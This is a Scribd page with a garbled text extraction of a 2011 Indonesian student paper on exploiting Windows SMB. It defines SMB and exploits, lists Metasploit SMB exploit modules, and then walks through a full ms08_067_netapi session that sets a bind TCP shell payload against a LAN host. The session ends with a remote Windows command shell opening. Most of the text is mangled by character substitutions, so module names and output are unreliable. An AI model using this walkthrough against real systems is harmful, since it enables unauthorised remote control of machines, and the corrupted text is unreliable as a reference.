Scribd Logo
Upload

Welcome to Scribd!

  • Jurnal Local Chapter Exploit

    Uploaded by

    abdullah al muzammi
    12 views5 pages
    Exploit SMB (server message Blok Protcol) Windows Abdullah Al Muzammi www.portme.net | www.jagabayasecurity.com muzammi06@yahoo.co.id | muzammi06@gmail.com Teknik Informatika STMIK AKAKOM YOGYAKARTA 2011

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Exploit SMB (server message Blok Protcol) Windows Abdullah Al Muzammi www.portme.net | www.jagabayasecurity.com muzammi06@yahoo.co.id | muzammi06@gmail.com Teknik Informatika STMIK AKAKOM YOGYAKARTA 2011

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    12 views5 pages

    Jurnal Local Chapter Exploit

    Uploaded by

    abdullah al muzammi
    Exploit SMB (server message Blok Protcol) Windows Abdullah Al Muzammi www.portme.net | www.jagabayasecurity.com muzammi06@yahoo.co.id | muzammi06@gmail.com Teknik Informatika STMIK AKAKOM YOGYAKARTA 2011

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as docx, pdf, or txt
    of 5

    !

    u8nAL LCCAL CPA1L8 WWWSC8l8uCCM/MuZAMMl_06



    Lxp|o|t SM8 (server message 8|ok rotco|) W|ndows
    Abdu||ah A| Muzamm|
    wwwporLmeneL | www[agabayasecurlLycom
    muzamml06[yahoocold | muzamml06[gmallcom

    1ekn|k Informat|ka
    S1MIk AkAkCM CGAkAk1A
    2011

    1 Introduct|on
    Smb
    Server Message 8lock dlslngkaL SM8 adalah lsLllah bahasa lnggrls dalam Leknologl lnformasl
    yang mengacu kepada proLokol cllenL/server yang dlLu[ukan sebagal layanan unLuk berbagl
    berkas (flle sharlng) dl dalam sebuah [arlngan roLokol lnl serlngnya dlgunakan dl dalam slsLem
    operasl MlcrosofL Wlndows dan l8M CS/2 SlsLem operasl berbasls unlx [uga dapaL
    menggunakannya dengan Lambahan perangkaL lunak yang dlsebuL dengan SAM8A(wlklpedla
    hLLp//ldwlklpedlaorg/wlkl/Server_Message_8lock)

    Lxp|o|t
    LxplolL adalah sebuah kode yang menyerang keamanan_kompuLer secara speslflk LxplolL
    banyak dlgunakan unLuk penenLrasl balk secara legal aLaupun llegal unLuk mencarl kelemahan
    (vulnerablllLy) pada kompuLer Lu[uan 8lsa [uga dlkaLakan sebuah perangkaL lunak yang
    menyerang kerapuhan keamanan (securlLy vulnerablllLy) yang speslflk namun Lldak selalu
    berLu[uan unLuk melancarkan aksl yang Lldak dllnglnkan 8anyak penellLl keamanan kompuLer
    menggunakan explolL unLuk mendemonsLraslkan bahwa suaLu slsLem memlllkl kerapuhan
    2 Imp|entas|

    Things smb on exploit we have choise :
    ose explolt/wloJows/smb/ms0J_049_oetopl
    ose explolt/wloJows/smb/ms06_066_owopl
    ose explolt/wloJows/smb/psexec
    ose explolt/wloJows/smb/ms04_007_klllblll
    ose explolt/wloJows/smb/ms06_066_owwks
    ose explolt/wloJows/smb/smb_teloy
    ose explolt/wloJows/smb/ms04_011_lsoss
    ose explolt/wloJows/smb/ms06_070_wkssvc
    ose
    explolt/wloJows/smb/tlmbokto_ploqbotcommooJ_
    bof
    ose explolt/wloJows/smb/ms04_0J1_oetJJe
    ose
    explolt/wloJows/smb/ms07_029_msJos_zooeoome
    ose


    ose explolt/wloJows/smb/ms06_025_tosmoos_teq
    ose
    explolt/wloJows/smb/ms09_050_smb2_oeqotlote_fooc_lo
    Jex ose
    explolt/wloJows/smtp/ms0J_046_excbooqe2000_xexcb50
    ose explolt/wloJows/smb/ms06_025_ttos
    ose explolt/wloJows/smb/ms10_061_spoolss
    ose explolt/wloJows/smtp/wmollsetvet
    ose explolt/wloJows/smb/ms06_040_oetopl
    ose explolt/wloJows/smb/oetlJeotlty_xtlettpcplpe
    ose explolt/wloJows/smtp/ypops_ovetflow1
    explolt/wloJows/smtp/mollcottlet_smtp_eblo
    ose explolt/wloJows/smb/ms05_0J9_pop
    ose explolt/wloJows/smb/ms08_067_oetopl
    ose explolt/wloJows/smtp/metcoty_ctom_mJ5

    msf use explolL/wlndows/smb/ms08_067_neLapl
    msf explolL(ms08_067_neLapl) show opLlons
    Module opLlons (explolL/wlndows/smb/ms08_067_neLapl)
    name CurrenL SeLLlng 8equlred uescrlpLlon

    8PCS1 yes 1he LargeL address
    8C81 443 yes SeL Lhe SM8 servlce porL
    SM8lL 88CWSL8 yes 1he plpe name Lo use (88CWSL8 S8vSvC)
    LxplolL LargL
    ld name

    0 AuLomaLlc 1argeLlng


    msf explolL(ms08_067_neLapl) seL 8PCS1 19216836101
    8PCS1 19216836101
    msf explolL(ms08_067_neLapl) show opLlons

    Module opLlons (explolL/wlndows/smb/ms08_067_neLapl)

    name CurrenL SeLLlng 8equlred uescrlpLlon

    8PCS1 19216836101 yes 1he LargeL address
    8C81 443 yes SeL Lhe SM8 servlce porL
    SM8lL 88CWSL8 yes 1he plpe name Lo use (88CWSL8 S8vSvC)


    LxplolL LargeL

    ld name

    0 AuLomaLlc 1argeLlng


    msf explolL(ms08_067_neLapl) seL A?LCAu wlndows/shell/blnd_
    seL A?LCAu wlndows/shell/blnd_lpv6_Lcp seL A?LCAu wlndows/shell/blnd_nonx_Lcp seL A?LCAu
    wlndows/shell/blnd_Lcp
    msf explolL(ms08_067_neLapl) seL A?LCAu wlndows/shell/blnd_Lcp
    A?LCAu wlndows/shell/blnd_Lcp
    msf explolL(ms08_067_neLapl) show opLlons

    Module opLlons (explolL/wlndows/smb/ms08_067_neLapl)

    name CurrenL SeLLlng 8equlred uescrlpLlon

    8PCS1 19216836101 yes 1he LargeL address
    8C81 443 yes SeL Lhe SM8 servlce porL
    SM8lL 88CWSL8 yes 1he plpe name Lo use (88CWSL8 S8vSvC)


    ayload opLlons (wlndows/shell/blnd_Lcp)

    name CurrenL SeLLlng 8equlred uescrlpLlon

    Lxl1lunC Lhread yes LxlL Lechnlque seh Lhread process none
    LC81 4444 yes 1he llsLen porL
    8PCS1 19216836101 no 1he LargeL address


    LxplolL LargeL

    ld name

    0 AuLomaLlc 1argeLlng


    msf explolL(ms08_067_neLapl) explolL

    * SLarLed blnd handler
    * AuLomaLlcally deLecLlng Lhe LargeL
    * llngerprlnL Wlndows x Servlce ack 3 langLngllsh
    * SelecLed 1argeL Wlndows x S3 Lngllsh (nx)
    * ALLempLlng Lo Lrlgger Lhe vulnerablllLy
    * Sendlng sLage (240 byLes) Lo 19216836101
    * Command shell sesslon 1 opened (19216836138332 192168361014444) aL 20111201
    131136 +0700

    MlcrosofL Wlndows x verslon 312600
    (C) CopyrlghL 19832001 MlcrosofL Corp

    CWlnuCWSsysLem32

    You might also like